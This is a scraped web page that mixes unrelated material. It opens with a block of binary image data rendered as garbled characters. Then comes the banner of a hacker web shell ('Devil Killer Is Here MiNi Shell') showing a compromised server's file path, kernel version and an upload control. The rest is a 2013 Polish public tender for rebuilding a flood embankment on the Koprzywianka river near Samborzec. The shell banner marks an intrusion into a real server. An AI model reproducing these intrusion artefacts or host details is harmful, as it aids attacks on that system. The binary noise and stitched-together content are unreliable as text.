JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130821/166043-N-2013.html

<p class="kh_header"><b>Kielce: Rozbudowa prawego wału rzeki Koprzywianki w zakresie km 2+100 - 4+600 gm. Samborzec, woj. świętokrzyskie w ramach Programu ochrony przed powodzią w dorzeczu górnej Wisły</b><br>
<b>Numer ogłoszenia: 166043 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach , ul. Witosa 86, 25-561 Kielce, woj. świętokrzyskie, tel. 041 3340105 wew. 209, 309, faks 041 3340105 wew. 409.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szmiuw.kielce.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: wojewódzka samorządowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa prawego wału rzeki Koprzywianki w zakresie km 2+100 - 4+600 gm. Samborzec, woj. świętokrzyskie w ramach Programu ochrony przed powodzią w dorzeczu górnej Wisły.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia i miejsce realizacji przedmiotu zamówienia

kod CPV: 45246400-7 - roboty w zakresie ochrony przeciwpowodziowej 

1.1. Przedmiot zamówienia
Przedmiotem zamówienia jest realizacja zadania pn.: Rozbudowa prawego wału rzeki Koprzywianki w zakresie km 2+100 - 4+600 gm. Samborzec, woj. świętokrzyskie  w zakresie objętym dokumentacją projektową, opracowaną w 2011r. przez Zespół Usług Projektowych    i Ekologicznych EKOWODA s.c., ul. Przemysłowa 11, 35+105 Rzeszów, składającą się    z: projektu budowlanego, projektu wykonawczego, specyfikacji technicznej wykonania i odbioru robót oraz przedmiaru robót o charakterze wyłącznie informacyjnym.
Dla omawianego przedsięwzięcia Świętokrzyski Zarząd Melioracji i Urządzeń Wodnych w Kielcach posiada decyzję Świętokrzyskiego Wojewódzkiego Inspektora Nadzoru Budowlanego w Kielcach Znak: WINB-WIK.7741.9.2012.W nakazującą usunięcie nieodpowiedniego stanu technicznego prawego wału przeciwpowodziowego rzeki Koprzywianki w km 2+100 - 4+600.
Celem inwestycji jest zwiększenie stopnia zabezpieczenia przeciwpowodziowego prawobrzeżnej doliny rzeki Koprzywianki na terenie gminy Samborzec. Niedostateczny stan techniczny istniejącego obwałowania, liczne przesiąki w korpusie i lokalne przelewy przez koronę wału stwarzają niebezpieczeństwo dla mieszkańców z terenów przyległych do wału i okolic. Dla zapewnienia wymaganego bezpieczeństwa terenów chronionych zgodnie z obowiązującymi w tym zakresie przepisami należy między innymi podnieść koronę wału do wymaganych rzędnych z poszerzeniem wału od strony odwodnej, uszczelnić  korpus wału oraz od strony odwodnej  zmodernizować śluzy wałowe oraz uporządkować układ komunikacyjny wału.
Korona wału jest nieumocniona i zdeformowana, zarówno w przekroju poprzecznym jak i profilu poodłuznym, co stanowi rezultat ponad 80-letniej eksploatacji wału. Ponadto cykliczne przesuszanie, brylenie i nawadnianie powierzchniowej strefy w korpusie, przemrożenie gruntu i jego rozluźnienie w strefie przypowierzchniowej a także wpływ wezbrań powodziowych, spływów powierzchniowych podczas intensywnych opadów deszczu oraz roztopów wiosennych, stanowią bezpośrednią przyczynę sukcesywnego pogarszania się stanu technicznego wału i przydatności do bezpiecznej i zgodnej z jego funkcją eksploatacji wału. Również nachylenia skarpy odwodnej wału nie spełniają minimalnych wymagań dotyczących maksymalnych nachyleń. Jeszcze gorzej ocenia się w ty zakresie nachylenia skarpy odpowietrznej. Szerokość korony wału jest niedostateczna i na całej długości wymaga dostosowania parametrów przekroju, w tym : szerokości, spadków poprzecznych i umocnienia do wymagań zgodnych z obowiązującymi przepisami w tym zakresie. Również istniejące przepusty wałowe (w km 2+329 i 4+332) wykazują zły stan techniczny i wymagają przebudowy i docelowej rozbudowy.
Podczas wezbrania majowo-czerwcowego 2010 roku na odcinku km 1+000 - 4+800 miały miejsce największe przesiąki filtracyjne i przebicia hydrauliczne przy stopie odpowietrznej wału oraz na terenie zawala w odległości ok. 10m od korpusu obwałowania, zagrażające bezpieczeństwu wału. Skarpy wału, zwłaszcza odwodna, są podatne na ruchy powierzchniowe, co w trakcie kolejnych wezbrań powodziowych może prowadzić do lokalnych zsuwów i zrywów skarpy odwodnej, z zagrożeniem stateczności ogólnej wału włącznie.
Przedmiotowe zadanie zrealizowane zostanie w nawiązaniu do ustaleń koncepcji Ochrony przed powodzią w Wisły i jej dopływów w rejonie Sandomierza i Tarnobrzega  i stanowić będzie I etap prac związanych z zabepieczeniem  p.powodziowym prawego wału rzeki Koprzywianki                 i muszą zostać wykonane w trybie pilnym.
Inwestycja wykonana zostanie w ramach zabezpieczenia przed zagrożeniem powodziowym doliny Wisły - węzeł Sandomierz, a jej wykonanie zwiększy bezpieczeństwo p.powodziowe na przyległych terenach, zmniejszy wysokość strat i szkód w mieniu, wypłatę odszkodowań w przypadku wystąpienia powodzi.

Realizowana inwestycja polegać będzie na wykonaniu m.in. następujących robót:
- doprowadzenie korony wału do wymaganych rzędnych, z poszerzeniem wału od strony odwodnej,
- właściwe wyprofilowanie wału od strony odwodnej,
- uszczelnienie korpusu wału oraz podłoża od strony odwodnej,
- modernizację śluz wałowych oraz uporządkowanie układu komunikacyjnego wału.

Początek rozbudowy prawego wału rzeki Koprzywianki w zakresie km 2+100 - 4+600stanowi połączenie z uprzednio zrealizowanym odcinkiem według zadania inwestycyjnego Projekt remontu prawego wału rz. Koprzywianki w km 1+700-2+100 rzędna wału 148,55, natomiast koniec stanowi połączenie z uprzednio zrealizowanym odcinkiem według Projektu remontu prawego wału rz. Koprzywianki zad. 2 Zawierzbie w km 4+600 - 5+200 rzędna wału 148,80.
Projektowane parametry wału:
- szerokość korony wału 3,50m, w tym droga o nawierzchni tłuczniowej o szer. 3,0m;
- nachylenie odwodnej 1:2;
- nachylenie skarpy odlądowej bez zmian;
Analizowane przedsięwzięcie przewidywane jest do realizacji w ramach Programu ochrony przed powodzią w dorzeczu górnej Wisły.

Zgodnie z zapisami decyzji o środowiskowych uwarunkowaniach przedsięwzięcia (Znak: WOO-I.4233.1.2012.MM.10 z dnia 12.09.2012r.) Wykonawca zobowiązany jest zapewnić nadzór przyrodnika nad pracami związanymi z usuwaniem warstwy humusowej. Prace w rejonie terenów podmokłych prowadzić należy poza okresem godowym płazów (poza marcem - kwietniem).


Wykonawca w kosztach powinien również uwzględnić koszty wykonania i montażu tablicy informacyjnej, która powinna zostać umieszczona na placu budowy w momencie rozpoczęcia realizacji inwestycji i pozostać przez cały czas realizacji projektu oraz po zakończeniu budowy. Napisy na tablicy powinny być wykonane w sposób czytelny i trwały 
a. Tablica informacyjno-pamiątkowa winna spełniać  następujące wymagania:
-	jednostronna z blachy stalowej ocynkowanej o grubości 1,0 mm, krawędzie zagięte podwójnie lub PCV (nadruk bezpośrednio na PCV);
-	wielkość tablicy: 0,7 m x 0,9 m ;
-	Rodzaj czcionki: Arial;
-	Kolor tablicy - biały;
-	Kolor czcionki - czarny;
-	wydruk grafiki - pełny kolor 4.0;
-	nadruk na foli samoprzylepnej typu I;
-	laminat UV zabezpieczający wydruk;
b. Tablica informacyjno-pamiątkowa  musi zawierać co najmniej: 
-	Logo Programu;
-	Nazwę projektu;
-	Wartość dofinansowania;
-	Źródło dofinansowania; 

Logo programu powinno zajmować co najmniej 25 % wielkości tablicy w układzie pionowym  i poziomym. 
Napis o treści  PROJEKT ROZBUDOWA PRAWEGO WAŁU RZEKI KOPRZYWIANKI W ZAKRESIE KM 2+100 - 4+600 GM. SAMBORZEC, WOJ. ŚWIĘTOKRZYSKIE ZREALIZOWANY W RAMACH PROGRAMU  OCHRONY PRZED POWOODZIĄ W DORZECZU GÓRNEJ WISŁY WARTOŚĆ CAŁKOWITA PROJEKTU ....PLN w układzie przedstawionym w załączniku nr 13a,  powinien zajmować ok. 75 % wielkości tablicy. 
Napisy na tablicy powinny być wykonane w sposób czytelny i trwały.

c. Konstrukcja:
-	rurka ocynkowana - lakierowana 2cale o wys. całkowitej 3,0 m - 4,0 m, - 1 szt.
-	uchwyty mocujące - 2 szt.
-	Montaż tablicy - wysokość 1,5 - 2,5 m nad ziemią. 

d. W uzasadnionych przypadkach dopuszcza się  umieszczanie na tablicy, po wcześniejszej  konsultacji i akceptacji Biura Programu,  innych informacji niż określonych w pkt. 2. 


2. Czas eksponowania tablicy: od dnia rozpoczęcia inwestycji.

Tablica informacyjna powinna spełniać również wymogi dotyczące tablicy pamiątkowej i po zakończeniu budowy pozostanie jako pamiątkowa.
Koszt wykonania oraz montażu tablicy informacyjno-pamiątkowej powinien być oddzielnie wyspecyfikowany w ofercie.


3. Do zakresu określonego w dokumentacji technicznej należy ponadto:

- zamieszczenie w miejscu realizacji projektu tablicy informująco-pamiątkowej o finansowaniu inwestycji ze środków otrzymanych w ramach Programu ochrony przed powodzią w dorzeczu górnej Wisły;
- urządzenie zaplecza dla prowadzonych robót;
- sporządzenie planu BIOZ dla potrzeb budowy;
- zabezpieczenie robót pod względem BHP;
- zapewnienie dróg dojazdowych;
- dwukrotne w ciągu roku przez okres gwarancji trwający 3 lata koszenie obu skarp oraz korony remontowanego odcinka wału wraz z dokonaniem ewentualnych podsiewów mieszankami traw           i nawożeniem. 

4. Przedmiot zamówienia należy wykonać:

-	 na warunkach określonych niniejszą SIWZ  i wzorem umowy

oraz zgodnie z:

-	obowiązującymi przepisami BHP;
-	warunkami technicznymi wykonania i odbioru robót;
-	polskimi normami oraz obowiązującymi normami branżowymi, 
-	przepisami prawa budowlanego 
-	zasadami wiedzy technicznej
-	uzgodnieniami.




5. Dokumentacja techniczna, SIWZ  zwane są dalej dokumentacją przetargową.

Podane w dokumentacji technicznej nazwy produktów urządzeń lub danych rozwiązań technologicznych, służą tylko i wyłącznie do określenia parametrów jakościowo-technicznych wymaganych przez Zamawiającego. Zamawiający dopuszcza stosowanie równoważnych produktów lub urządzeń które spełniają wymagania jakościowo-techniczne określone przez zamawiającego. 

W przypadku, gdy w dokumentacji technicznej opisano materiały, urządzenia lub dane rozwiązania technologiczne za pomocą podania nazwy ich producenta, patentów lub pochodzenia, to w odniesieniu do tych materiałów, urządzeń lub danych rozwiązań technologicznych Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych równoważnych materiałów urządzeń lub danych rozwiązań technologicznych pod warunkiem posiadania przez nie parametrów nie gorszych niż materiały, urządzenia lub dane rozwiązania technologiczne, które one zastępują. W takiej sytuacji Wykonawca stosując materiały, urządzenia lub dane rozwiązania technologiczne równoważne zobowiązany jest zgodnie z art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( tj. 2010r., Dz.U. nr 113,poz. 759 z późn. zm. - zwana dalej ustawą) wykazać, że oferowane przez niego materiały , urządzenia lub dane rozwiązania technologiczne spełniają wymagania Zamawiającego. W sytuacji gdy Wykonawca zamierza zastosować inne materiały ( wyroby) , urządzenia lub dane rozwiązania technologiczne niż podane w dokumentacji projektowej winien dołączyć do oferty wykaz zawierający materiały (wyroby) , urządzenia lub dane rozwiązania technologiczne zawarte w dokumentacji oraz podać ich równoważniki (nazwy materiałów (wyrobów), urządzeń lub danych rozwiązań technologicznych zaproponowanych w ofercie) wraz z charakterystykami technicznymi oraz dokumentami potwierdzającymi ich równoważność. W przypadku, gdy Wykonawca takiego wykazu nie dołączy do oferty zobowiązany będzie do wbudowania urządzeń i materiałów zgodnie z dokumentacją techniczną, o której mowa w pkt. 1. 

6. Dokumentacja techniczna, SIWZ, wzór umowy oraz wzór oferty zwane są dalej   dokumentacją przetargową

7.	Termin wykonania zamówienia 


Termin wykonania całego zamówienia (wraz z odbiorem końcowym): do dnia 15-12-2014 r.

Zamawiający zakłada, że inwestycja będzie realizowana w cyklu dwuletnim: od podpisania umowy z Wykonawcą w 2013 r. do dnia 15-12-2014 r.
Zamawiający zakłada, że inwestycja będzie realizowana w cyklu dwuletnim: od podpisania umowy z Wykonawcą w 2013 r. do dnia 15-12-2014 r.

Zamawiający posiada zabezpieczone do wykorzystania w roku 2014 r. środki na przedmiotowe zadanie w kwocie 1 645 000,00 zł brutto. 

Zamawiający wymaga, aby Wykonawca w roku  2014 (w terminie do dnia 28-11-2014 r.) wykonał zakres robót przeznaczonych do zafakturowania na wartość równą 1 645 000,00 zł brutto.

W terminie do dnia 18-12-2013r. Wykonawca zobowiązany jest do wykonania robót budowlanych (przeznaczonych do zafakturowania) o wartości równej kwocie całkowitego wynagrodzenia Wykonawcy za wykonanie całego przedmiotu zamówienia ustalonego na podstawie rozstrzygniętego postepowania o udzielenie zamówienia publicznego pomniejszonej  o kwotę równą  1 645 000,00 zł brutto. (równą wartości robót, które wykonawca wykona w roku 2014).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.24.64.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium przed upływem terminu składania ofert, z uwzględnieniem 30 dniowego terminu związania ofertą. Wadium może być wnoszone w pieniądzu, poręczeniach bankowych, poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest poręczeniem pieniężnym,  gwarancjach bankowych lub ubezpieczeniowych, poręczeniach udzielonych przez podmioty o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. 2007 Nr 42, poz.275 z późn. zm).
Wysokość wadium ustala się w kwocie 200 000,00 zł (słownie: dwieście tysięcy zł 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	posiadania wiedzy i doświadczenia, w realizacji robót odpowiadających przedmiotowi zamówienia tj.:

1.1.	Wykonania w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót  budowlanych (w ramach co najmniej jednego zamówienia) porównywalnych pod względem rozmiaru i rozwiązań technologicznych do robót objętych przedmiotem zamówienia. 

Za porównywalne uważa się roboty budowlane polegające na budowie, przebudowie lub rozbudowie (w rozumieniu art. 3 ustawy Prawo budowlane) budowli piętrzących, regulacyjnych, przeciwpowodziowych lub rzek o łącznej wartości brutto co  najmniej  10 mln zł, w tym co najmniej jedno zamówienie o wartości nie mniejszej niż 5 mln zł brutto obejmujące budowę lub rozbudowę wałów przeciwpowodziowych z uszczelnieniem korpusu i podłoża wału p.powodziowego co najmniej II klasy.


1.2.	Na potwierdzenie spełnienia warunku należy złożyć poniższe dokumenty   

2.	dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1  muszą być:

2.1.	sporządzony przez Wykonawcę wykaz robót budowlanych, o których mowa w pkt 1 we wzorze stanowiącym załącznik nr 2 do SIWZ. W wykazie tym należy potwierdzić spełnienie warunków określonych w pkt.1.1. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentów oryginał. 

2.2.	dowody (poświadczenia) potwierdzające, że roboty budowlane przedstawione w wykazie  zrealizowanych robót zostały wykonane należycie. Wymagana forma dokumentów oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - tj. 


1.1.	Kierownikiem budowy, posiadającym odpowiednie do zakresu robót uprawnienia budowlane wymagane prawem budowlanym dla przedmiotu zamówienia. Osoba przewidziana do pełnienia funkcji kierownika budowy winna posiadać doświadczenie w kierowaniu robotami budowlanymi w zakresie budowy, przebudowy lub remontu budowli piętrzących, regulacyjnych, przeciwpowodziowych lub rzek, w tym co najmniej jeden obiekt o wartości 5  mln zł brutto. 

Na potwierdzenie spełnienia powyższych warunków należy złożyć poniższe dokumenty.

2.	Dokumentami potwierdzającymi spełnianie warunku, o którym mowa w pkt. 1  muszą być: 

2.1.	Wykaz osób które będą uczestniczyć w wykonaniu zamówienia, spełniających wymagania określone w pkt. 1  we wzorze stanowiącym załącznik nr 3 do SIWZ wraz z informacją o sposobie dysponowania tymi osobami. 
W przypadku składania oferty przez Wykonawców występujących wspólnie warunek ten może spełnić, dowolny z Wykonawców występujących wspólnie lub może być spełniony łącznie. Wymagana forma dokumentu - oryginał


2.2.	Do wykazu należy załączyć oświadczenie, że osoby, które będą uczestniczyć                                 w wykonaniu zamówienia posiadają uprawnienia wymagane prawem - według wzoru stanowiącego załącznik nr 4 do SIWZ. Wymagana forma dokumentu - oryginał.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Inne dokumenty wymagane w postępowaniu przez Zamawiającego: 

1.1.	Wypełniony formularz ofertowy wg wzoru określonego w załączniku nr 1 do SIWZ     Wymagana forma dokumentu - oryginał.

1.2.	Oświadczenie z art. 36 ust. 4 ustawy Pzp we wzorze określonym w załączniku nr 5 do SIWZ. Wymagana forma dokumentu - oryginał.

1.3.	Pełnomocnictwo - jeżeli upoważnienie do podpisania oferty nie wynika wprost                                z dokumentu stwierdzającego status prawny Wykonawcy - nie dotyczy pełnomocnictwa w zakresie oferty Wykonawców wspólnie ubiegających się o zamówienie. Wymagana forma dokumentu oryginał lub kserokopia poświadczona notarialnie. 

1.4.	Pełnomocnictwo w przypadku oferty Wykonawców występujących wspólnie o udzielenie zamówienia, o którym mowa w rozdz. IX SIWZ. Forma dokumentu oryginał lub kopia poświadczona notarialnie.

1.5.	Na podstawie art. 25 ust. 1 ustawy w przypadku prowadzenia działalności w formie spółki cywilnej gdy jest więcej niż jeden przedsiębiorca (wspólnik) należy do oferty załączyć kserokopię umowy spółki poświadczoną za zgodność z oryginałem przez wszystkich wspólników lub pełnomocnika (wspólnika) umocowanego do takiej czynności. Warunek nie ma zastosowania w odniesieniu do spółek jawnych 
w przypadku załączenia do oferty aktualnego odpisu z właściwego rejestru - Krajowego Rejestru Sądowego, jeżeli ujawniono w nim wspólników spółki, oraz sposób reprezentowania spółki (składania oświadczeń woli).

1.6.	Wykonawca, w przypadku oferowania wyrobów lub urządzeń równoważnych stosownie do zapisu w rozdz. I pkt. 4 SIWZ w celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego załącza wykaz zawierający opisy urządzeń technicznych lub rozwiązań technologicznych równoważnych wraz z ich parametrami technicznymi (dla wyrobów lub rozwiązań równoważnych) przewidzianych do wbudowania (zamontowania) w ramach realizacji zamówienia odpowiadających co najmniej wymaganiom techniczno - jakościowym określonym w dokumentacji projektowej. Forma dokumentu oryginał

1.7.	W przypadku  wykonywania dyspozycji pkt. 5 rozdz. VII SIWZ, czyli w sytuacji kiedy Wykonawca wykazując spełnianie warunków, udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Wykonawca w celu udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, załącza do oferty:


